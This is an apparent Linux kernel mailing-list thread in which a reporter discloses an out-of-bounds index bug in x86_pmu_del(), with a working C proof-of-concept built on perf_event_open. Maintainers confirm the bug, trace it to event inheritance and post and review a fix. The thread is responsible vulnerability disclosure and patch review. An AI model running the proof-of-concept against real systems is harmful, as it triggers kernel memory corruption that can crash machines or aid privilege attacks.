[PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu

public inbox for linux-perf-users@vger.kernel.org
 help / color / mirror / Atom feed

* [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
@ 2026-03-09  1:41 Oliver Rosenberg
  2026-03-09 12:05 ` Peter Zijlstra
  0 siblings, 1 reply; 4+ messages in thread
From: Oliver Rosenberg @ 2026-03-09  1:41 UTC (permalink / raw)
  Cc: olrose55, Peter Zijlstra, Ingo Molnar, Arnaldo Carvalho de Melo,
	Namhyung Kim, Mark Rutland, Alexander Shishkin, Jiri Olsa,
	Ian Rogers, Adrian Hunter, James Clark, Thomas Gleixner,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Ravi Bangoria,
	linux-perf-users, linux-kernel

Vulnerability Description:
There exists a KASAN:wild-memory-access and an array-index-out-of-bounds
(-1 index) in x86_pmu_del(). When a cross-PMU event group is created
where the group leader is a PMU type that does not have txn implemented
then the cpuc->txn_flags for the siblings are not set because only the
group leader's pmu->start_txn() is called and in the case of not being
implemented it is set to perf_pmu_nop_txn(). The events are still attempted
to be processed as a group, when one of the x86 PMUs errors out,
cpuc->txn_flags is not set and event->hw.idx is not set. The x86_pmu_del()
function expects event->hw.idx not to be set when events are batched and
not yet enabled during a transaction so the function checks the
cpuc->txn_flags to skip the array-index-out-of-bounds. However, when an
event errors out and the group events are not enable here, cpuc->txn_flags
is not set and event->hw.idx is -1 so we do not skip the uses of
event->hw.idx which causes an array-index-out-of-bounds.

Vulnerability Reproduction (POC):
static int peo(struct perf_event_attr *a, int g) {
        return syscall(__NR_perf_event_open, a, 0, -1, g, 0);
}

int main(void) {
        struct perf_event_attr raw = {}, bp = {};
        int fds[64], n = 0, leader;

        raw.type = PERF_TYPE_RAW;
        raw.size = sizeof(raw);
        raw.config = 0x76;
        raw.exclude_kernel = 1;

        leader = peo(&raw, -1);
        if (leader < 0) return 1;
        while (n < 64 && (fds[n] = peo(&raw, leader)) >= 0) n++;
        for (int i = 0; i < n; i++) close(fds[i]);
        close(leader);
        if (n <= 0) return 1;

        bp.type = PERF_TYPE_BREAKPOINT;
        bp.size = sizeof(bp);
        bp.bp_type = 4;
        bp.bp_len = sizeof(long);
        bp.exclude_kernel = 1;
        bp.inherit = 1;
        leader = peo(&bp, -1);
        if (leader < 0) return 1;

        raw.inherit = 1;
        if (peo(&raw, leader) < 0 || peo(&raw, leader) < 0) return 1;

        for (int i = 0; i < n; i++)
                if (peo(&raw, -1) < 0) return 1;

        if (fork() == 0) _exit(0);
        wait(NULL);
        return 0;
}

POC Explanation:
The POC first fills the CPUs PMU events with x86 raw PMU events (type 4) to
set up the group scheduling to fail and trigger the bug, it then creates a
cross-PMU group with BREAKPOINT (type 5) as the group leader and 2 x86 raw
PMU siblings. The first sibling is added but batched and not enabled, the
second sibling fails on add because we exceed the max number of PMU events
for the cpu. This triggers the cleanup of the first sibling for which
cpu->txn_flags is not set and event->hw.idx=-1 since sibling 1 was not
enabled. This triggers the bug when event->hw.idx is used as an
array-index-out-of-bounds in x86_pmu_del().

Suggested Fix:
The suggested fix is to add a check in x86_pmu_del() to verify
event->hw.idx is set before using the value. If it is not set then jump
over the use of event->hw.idx and proceed with cleanup.

Fixes: bd2756811766 ("perf: Rewrite core context handling")
Signed-off-by: Oliver Rosenberg <olrose55@gmail.com>
---

Notes:
    This patch fixes the symptom and prevents the array-index-out-of-bounds
    caused by the dangerous use of hw->idx when it is not set. I was not sure
    if it may make sense to also solve the root cause of the issue which is
    cpuc->txn_flags not being set for PMU events in a group where the group
    leader does not implement transactions, or if this would require a redesign
    to how group events are process and have potential performance
    degredations.

 arch/x86/events/core.c | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
index 03ce1bc7e..7474b2d66 100644
--- a/arch/x86/events/core.c
+++ b/arch/x86/events/core.c
@@ -1655,6 +1655,9 @@ static void x86_pmu_del(struct perf_event *event, int flags)
 	if (cpuc->txn_flags & PERF_PMU_TXN_ADD)
 		goto do_del;

+	if (event->hw.idx < 0)
+		goto remove_from_list;
+
 	__set_bit(event->hw.idx, cpuc->dirty);

 	/*
@@ -1663,6 +1666,8 @@ static void x86_pmu_del(struct perf_event *event, int flags)
 	x86_pmu_stop(event, PERF_EF_UPDATE);
 	cpuc->events[event->hw.idx] = NULL;

+remove_from_list:
+
 	for (i = 0; i < cpuc->n_events; i++) {
 		if (event == cpuc->event_list[i])
 			break;
-- 
2.43.0

^ permalink raw reply related	[flat|nested] 4+ messages in thread

* Re: [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
  2026-03-09  1:41 [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del Oliver Rosenberg
@ 2026-03-09 12:05 ` Peter Zijlstra
  2026-03-09 13:37   ` Peter Zijlstra
  0 siblings, 1 reply; 4+ messages in thread
From: Peter Zijlstra @ 2026-03-09 12:05 UTC (permalink / raw)
  To: Oliver Rosenberg
  Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
	Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
	James Clark, Thomas Gleixner, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, Ravi Bangoria, linux-perf-users, linux-kernel

On Sun, Mar 08, 2026 at 06:41:30PM -0700, Oliver Rosenberg wrote:
> Vulnerability Description:
> There exists a KASAN:wild-memory-access and an array-index-out-of-bounds
> (-1 index) in x86_pmu_del(). When a cross-PMU event group is created
> where the group leader is a PMU type that does not have txn implemented
> then the cpuc->txn_flags for the siblings are not set because only the
> group leader's pmu->start_txn() is called and in the case of not being
> implemented it is set to perf_pmu_nop_txn(). The events are still attempted
> to be processed as a group, when one of the x86 PMUs errors out,
> cpuc->txn_flags is not set and event->hw.idx is not set. The x86_pmu_del()
> function expects event->hw.idx not to be set when events are batched and
> not yet enabled during a transaction so the function checks the
> cpuc->txn_flags to skip the array-index-out-of-bounds. However, when an
> event errors out and the group events are not enable here, cpuc->txn_flags
> is not set and event->hw.idx is -1 so we do not skip the uses of
> event->hw.idx which causes an array-index-out-of-bounds.

I can confirm your POC works, and that the above is somehow what
happens. But it is not what should be happening.

Specifically, by adding an x86 even to a 'software' event, the software
event should be moved to the x86 pmu_ctx (move_group case in
perf_event_open) and then group_event->pmu_ctx->pmu should end up being
the x86 pmu in group_sched_in().

Tracing shows the move_group path is indeed taken and pmu_ctx is
adjusted.

> POC Explanation:
> The POC first fills the CPUs PMU events with x86 raw PMU events (type 4) to
> set up the group scheduling to fail and trigger the bug, it then creates a
> cross-PMU group with BREAKPOINT (type 5) as the group leader and 2 x86 raw
> PMU siblings. The first sibling is added but batched and not enabled, the
> second sibling fails on add because we exceed the max number of PMU events
> for the cpu. This triggers the cleanup of the first sibling for which
> cpu->txn_flags is not set and event->hw.idx=-1 since sibling 1 was not
> enabled. This triggers the bug when event->hw.idx is used as an
> array-index-out-of-bounds in x86_pmu_del().

You're forgetting part of what the POC does:

      if (fork() == 0) _exit(0);
        wait(NULL);


Without that, it doesn't reproduce. Suggesting there's something wrong
with inherit.

And indeed, the below makes it go away.

Now, let me go audit the code to see if this same problem exists in more
shapes...

diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
index 03ce1bc7ef2e..75cd651a7f55 100644
--- a/arch/x86/events/core.c
+++ b/arch/x86/events/core.c
@@ -1655,6 +1655,8 @@ static void x86_pmu_del(struct perf_event *event, int flags)
 	if (cpuc->txn_flags & PERF_PMU_TXN_ADD)
 		goto do_del;
 
+	WARN_ON(event->hw.idx < 0);
+
 	__set_bit(event->hw.idx, cpuc->dirty);
 
 	/*
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 03ced7aad309..ab968203b735 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -14743,7 +14749,7 @@ inherit_event(struct perf_event *parent_event,
 	get_ctx(child_ctx);
 	child_event->ctx = child_ctx;
 
-	pmu_ctx = find_get_pmu_context(child_event->pmu, child_ctx, child_event);
+	pmu_ctx = find_get_pmu_context(parent_event->pmu_ctx->pmu, child_ctx, child_event);
 	if (IS_ERR(pmu_ctx)) {
 		free_event(child_event);
 		return ERR_CAST(pmu_ctx);

^ permalink raw reply related	[flat|nested] 4+ messages in thread

* Re: [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
  2026-03-09 12:05 ` Peter Zijlstra
@ 2026-03-09 13:37   ` Peter Zijlstra
  2026-03-09 15:48     ` Ian Rogers
  0 siblings, 1 reply; 4+ messages in thread
From: Peter Zijlstra @ 2026-03-09 13:37 UTC (permalink / raw)
  To: Oliver Rosenberg
  Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
	Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
	James Clark, Thomas Gleixner, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, Ravi Bangoria, linux-perf-users, linux-kernel

On Mon, Mar 09, 2026 at 01:05:43PM +0100, Peter Zijlstra wrote:
> Now, let me go audit the code to see if this same problem exists in more
> shapes...

I've ended up with the below.

---
Subject: perf: Make sure to use pmu_ctx->pmu for groups
From: Peter Zijlstra <peterz@infradead.org>
Date: Mon Mar 9 13:55:46 CET 2026

Oliver reported that x86_pmu_del() ended up doing an out-of-bound memory access
when group_sched_in() fails and needs to roll back.

This *should* be handled by the transaction callbacks, but he found that when
the group leader is a software event, the transaction handlers of the wrong PMU
are used. Despite the move_group case in perf_event_open() and group_sched_in()
using pmu_ctx->pmu.

Turns out, inherit uses event->pmu to clone the events, effectively undoing the
move_group case for all inherited contexts. Fix this by also making inherit use
pmu_ctx->pmu, ensuring all inherited counters end up in the same pmu context.

Similarly, __perf_event_read() should use equally use pmu_ctx->pmu for the
group case.

Fixes: bd2756811766 ("perf: Rewrite core context handling")
Reported-by: Oliver Rosenberg <olrose55@gmail.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
---
 kernel/events/core.c |   14 ++++++--------
 1 file changed, 6 insertions(+), 8 deletions(-)

--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -4813,7 +4813,7 @@ static void __perf_event_read(void *info
 	struct perf_event *sub, *event = data->event;
 	struct perf_event_context *ctx = event->ctx;
 	struct perf_cpu_context *cpuctx = this_cpu_ptr(&perf_cpu_context);
-	struct pmu *pmu = event->pmu;
+	struct pmu *pmu;
 
 	/*
 	 * If this is a task context, we need to check whether it is
@@ -4825,7 +4825,7 @@ static void __perf_event_read(void *info
 	if (ctx->task && cpuctx->task_ctx != ctx)
 		return;
 
-	raw_spin_lock(&ctx->lock);
+	guard(raw_spinlock)(&ctx->lock);
 	ctx_time_update_event(ctx, event);
 
 	perf_event_update_time(event);
@@ -4833,14 +4833,15 @@ static void __perf_event_read(void *info
 		perf_event_update_sibling_time(event);
 
 	if (event->state != PERF_EVENT_STATE_ACTIVE)
-		goto unlock;
+		return;
 
 	if (!data->group) {
 		pmu->read(event);
 		data->ret = 0;
-		goto unlock;
+		return;
 	}
 
+	pmu = event->pmu_ctx->pmu;
 	pmu->start_txn(pmu, PERF_PMU_TXN_READ);
 
 	pmu->read(event);
@@ -4849,9 +4850,6 @@ static void __perf_event_read(void *info
 		perf_pmu_read(sub);
 
 	data->ret = pmu->commit_txn(pmu);
-
-unlock:
-	raw_spin_unlock(&ctx->lock);
 }
 
 static inline u64 perf_event_count(struct perf_event *event, bool self)
@@ -14743,7 +14741,7 @@ inherit_event(struct perf_event *parent_
 	get_ctx(child_ctx);
 	child_event->ctx = child_ctx;
 
-	pmu_ctx = find_get_pmu_context(child_event->pmu, child_ctx, child_event);
+	pmu_ctx = find_get_pmu_context(parent_event->pmu_ctx->pmu, child_ctx, child_event);
 	if (IS_ERR(pmu_ctx)) {
 		free_event(child_event);
 		return ERR_CAST(pmu_ctx);

^ permalink raw reply	[flat|nested] 4+ messages in thread

* Re: [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
  2026-03-09 13:37   ` Peter Zijlstra
@ 2026-03-09 15:48     ` Ian Rogers
  0 siblings, 0 replies; 4+ messages in thread
From: Ian Rogers @ 2026-03-09 15:48 UTC (permalink / raw)
  To: Peter Zijlstra
  Cc: Oliver Rosenberg, Ingo Molnar, Arnaldo Carvalho de Melo,
	Namhyung Kim, Mark Rutland, Alexander Shishkin, Jiri Olsa,
	Adrian Hunter, James Clark, Thomas Gleixner, Borislav Petkov,
	Dave Hansen, x86, H. Peter Anvin, Ravi Bangoria, linux-perf-users,
	linux-kernel

On Mon, Mar 9, 2026 at 6:37 AM Peter Zijlstra <peterz@infradead.org> wrote:
>
> On Mon, Mar 09, 2026 at 01:05:43PM +0100, Peter Zijlstra wrote:
> > Now, let me go audit the code to see if this same problem exists in more
> > shapes...
>
> I've ended up with the below.
>
> ---
> Subject: perf: Make sure to use pmu_ctx->pmu for groups
> From: Peter Zijlstra <peterz@infradead.org>
> Date: Mon Mar 9 13:55:46 CET 2026
>
> Oliver reported that x86_pmu_del() ended up doing an out-of-bound memory access
> when group_sched_in() fails and needs to roll back.
>
> This *should* be handled by the transaction callbacks, but he found that when
> the group leader is a software event, the transaction handlers of the wrong PMU
> are used. Despite the move_group case in perf_event_open() and group_sched_in()
> using pmu_ctx->pmu.
>
> Turns out, inherit uses event->pmu to clone the events, effectively undoing the
> move_group case for all inherited contexts. Fix this by also making inherit use
> pmu_ctx->pmu, ensuring all inherited counters end up in the same pmu context.
>
> Similarly, __perf_event_read() should use equally use pmu_ctx->pmu for the
> group case.
>
> Fixes: bd2756811766 ("perf: Rewrite core context handling")
> Reported-by: Oliver Rosenberg <olrose55@gmail.com>
> Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>

Reviewed-by: Ian Rogers <irogers@google.com>

Thanks,
Ian

> ---
>  kernel/events/core.c |   14 ++++++--------
>  1 file changed, 6 insertions(+), 8 deletions(-)
>
> --- a/kernel/events/core.c
> +++ b/kernel/events/core.c
> @@ -4813,7 +4813,7 @@ static void __perf_event_read(void *info
>         struct perf_event *sub, *event = data->event;
>         struct perf_event_context *ctx = event->ctx;
>         struct perf_cpu_context *cpuctx = this_cpu_ptr(&perf_cpu_context);
> -       struct pmu *pmu = event->pmu;
> +       struct pmu *pmu;
>
>         /*
>          * If this is a task context, we need to check whether it is
> @@ -4825,7 +4825,7 @@ static void __perf_event_read(void *info
>         if (ctx->task && cpuctx->task_ctx != ctx)
>                 return;
>
> -       raw_spin_lock(&ctx->lock);
> +       guard(raw_spinlock)(&ctx->lock);
>         ctx_time_update_event(ctx, event);
>
>         perf_event_update_time(event);
> @@ -4833,14 +4833,15 @@ static void __perf_event_read(void *info
>                 perf_event_update_sibling_time(event);
>
>         if (event->state != PERF_EVENT_STATE_ACTIVE)
> -               goto unlock;
> +               return;
>
>         if (!data->group) {
>                 pmu->read(event);
>                 data->ret = 0;
> -               goto unlock;
> +               return;
>         }
>
> +       pmu = event->pmu_ctx->pmu;
>         pmu->start_txn(pmu, PERF_PMU_TXN_READ);
>
>         pmu->read(event);
> @@ -4849,9 +4850,6 @@ static void __perf_event_read(void *info
>                 perf_pmu_read(sub);
>
>         data->ret = pmu->commit_txn(pmu);
> -
> -unlock:
> -       raw_spin_unlock(&ctx->lock);
>  }
>
>  static inline u64 perf_event_count(struct perf_event *event, bool self)
> @@ -14743,7 +14741,7 @@ inherit_event(struct perf_event *parent_
>         get_ctx(child_ctx);
>         child_event->ctx = child_ctx;
>
> -       pmu_ctx = find_get_pmu_context(child_event->pmu, child_ctx, child_event);
> +       pmu_ctx = find_get_pmu_context(parent_event->pmu_ctx->pmu, child_ctx, child_event);
>         if (IS_ERR(pmu_ctx)) {
>                 free_event(child_event);
>                 return ERR_CAST(pmu_ctx);

^ permalink raw reply	[flat|nested] 4+ messages in thread

end of thread, other threads:[~2026-03-09 15:48 UTC | newest]

Thread overview: 4+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-03-09  1:41 [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del Oliver Rosenberg
2026-03-09 12:05 ` Peter Zijlstra
2026-03-09 13:37   ` Peter Zijlstra
2026-03-09 15:48     ` Ian Rogers

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox